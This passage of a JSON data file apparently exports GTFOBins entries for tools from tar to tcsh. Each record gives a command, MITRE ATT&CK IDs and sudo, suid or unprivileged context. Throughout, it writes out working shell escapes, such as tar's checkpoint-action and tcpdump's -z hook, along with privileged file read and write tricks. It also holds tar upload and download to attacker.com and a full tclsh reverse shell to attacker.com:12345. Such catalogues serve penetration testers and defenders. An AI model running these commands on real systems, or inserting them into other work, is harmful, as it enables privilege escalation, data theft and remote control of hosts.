installation","aliases":[]},{"id":"gtfo:tar:download:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:download:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:file-read:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tar cf /dev/stdout /path/to/input-file -I 'tar xO'","description":"The file is read then passed to the specified command (e.g., `tar xO`) via standard input.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:file-read:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tar cf /dev/stdout /path/to/input-file -I 'tar xO'","description":"The file is read then passed to the specified command (e.g., `tar xO`) via standard input.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:file-read:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tar cf /dev/stdout /path/to/input-file -I 'tar xO'","description":"The file is read then passed to the specified command (e.g., `tar xO`) via standard input.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:file-write:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:file-write:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:file-write:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:1:sudo","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar xf /dev/null -I '/bin/sh -c \"/bin/sh 0<&2 1>&2\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:1:suid","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar xf /dev/null -I '/bin/sh -c \"/bin/sh 0<&2 1>&2\"'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:1:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tar xf /dev/null -I '/bin/sh -c \"/bin/sh 0<&2 1>&2\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:2:sudo","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 0<&1' >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar xf /path/to/temp-file.tar --to-command /bin/sh","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:2:suid","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 0<&1' >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar xf /path/to/temp-file.tar --to-command /bin/sh","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:shell:2:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '/bin/sh 0<&1' >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar xf /path/to/temp-file.tar --to-command /bin/sh","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:upload:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:upload:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:upload:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:task:shell:0:sudo","toolId":"gtfo:task","toolName":"task","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"task execute /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/task/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:task:shell:0:suid","toolId":"gtfo:task","toolName":"task","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"task execute /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/task/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:task:shell:0:unprivileged","toolId":"gtfo:task","toolName":"task","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"task execute /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/task/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:taskset:shell:0:sudo","toolId":"gtfo:taskset","toolName":"taskset","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"taskset 1 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/taskset/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:taskset:shell:0:unprivileged","toolId":"gtfo:taskset","toolName":"taskset","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"taskset 1 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/taskset/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tasksh:shell:0:sudo","toolId":"gtfo:tasksh","toolName":"tasksh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tasksh\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tasksh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tasksh:shell:0:suid","toolId":"gtfo:tasksh","toolName":"tasksh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tasksh\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tasksh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tasksh:shell:0:unprivileged","toolId":"gtfo:tasksh","toolName":"tasksh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tasksh\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tasksh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tbl:file-read:0:sudo","toolId":"gtfo:tbl","toolName":"tbl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tbl /path/to/input-file","description":"The read file content is corrupted by additional text at the beginning.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tbl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tbl:file-read:0:suid","toolId":"gtfo:tbl","toolName":"tbl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tbl /path/to/input-file","description":"The read file content is corrupted by additional text at the beginning.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tbl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tbl:file-read:0:unprivileged","toolId":"gtfo:tbl","toolName":"tbl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tbl /path/to/input-file","description":"The read file content is corrupted by additional text at the beginning.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tbl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:library-load:0:capabilities","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:library-load:0:sudo","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:library-load:0:suid","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:library-load:0:unprivileged","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:reverse-shell:0:sudo","toolId":"gtfo:tclsh","toolName":"tclsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"tclsh\nset s [socket attacker.com 12345];while 1 { puts -nonewline $s \"> \";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:reverse-shell:0:suid","toolId":"gtfo:tclsh","toolName":"tclsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"tclsh\nset s [socket attacker.com 12345];while 1 { puts -nonewline $s \"> \";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:reverse-shell:0:unprivileged","toolId":"gtfo:tclsh","toolName":"tclsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"tclsh\nset s [socket attacker.com 12345];while 1 { puts -nonewline $s \"> \";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:shell:0:sudo","toolId":"gtfo:tclsh","toolName":"tclsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tclsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:shell:0:suid","toolId":"gtfo:tclsh","toolName":"tclsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tclsh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tclsh:shell:0:unprivileged","toolId":"gtfo:tclsh","toolName":"tclsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tclsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tclsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcpdump:command:0:sudo","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\ntcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /path/to/temp-file -Z root","description":"This requires some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcpdump:command:0:unprivileged","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\ntcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /path/to/temp-file","description":"This requires some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcpdump:command:1:sudo","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"tcpdump -ln -i lo -w 'command-argument' -W 1 -G 1 -z /path/to/command","description":"This require some traffic to be actually captured. Also note that the `command-argument` string is both passed to the command and written as file, hence some restrictions apply.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcpdump:command:1:unprivileged","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"tcpdump -ln -i lo -w 'command-argument' -W 1 -G 1 -z /path/to/command","description":"This require some traffic to be actually captured. Also note that the `command-argument` string is both passed to the command and written as file, hence some restrictions apply.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcpdump:file-write:0:sudo","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user","description":"This saves the packet dump (count is 1) from the loopback interface to a file. To trigger the capture use something like:\n\n```\nnc -u localhost 1 <<<DATA\n```\n\nWhile `user` is the owner of the packet dump file, the invoking user must be able to capture traffic on the device.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcpdump:file-write:0:suid","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user","description":"This saves the packet dump (count is 1) from the loopback interface to a file. To trigger the capture use something like:\n\n```\nnc -u localhost 1 <<<DATA\n```\n\nWhile `user` is the owner of the packet dump file, the invoking user must be able to capture traffic on the device.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcpdump:file-write:0:unprivileged","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user","description":"This saves the packet dump (count is 1) from the loopback interface to a file. To trigger the capture use something like:\n\n```\nnc -u localhost 1 <<<DATA\n```\n\nWhile `user` is the owner of the packet dump file, the invoking user must be able to capture traffic on the device.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcsh:file-write:0:sudo","toolId":"gtfo:tcsh","toolName":"tcsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcsh:file-write:0:suid","toolId":"gtfo:tcsh","toolName":"tcsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcsh -bc 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tcsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution 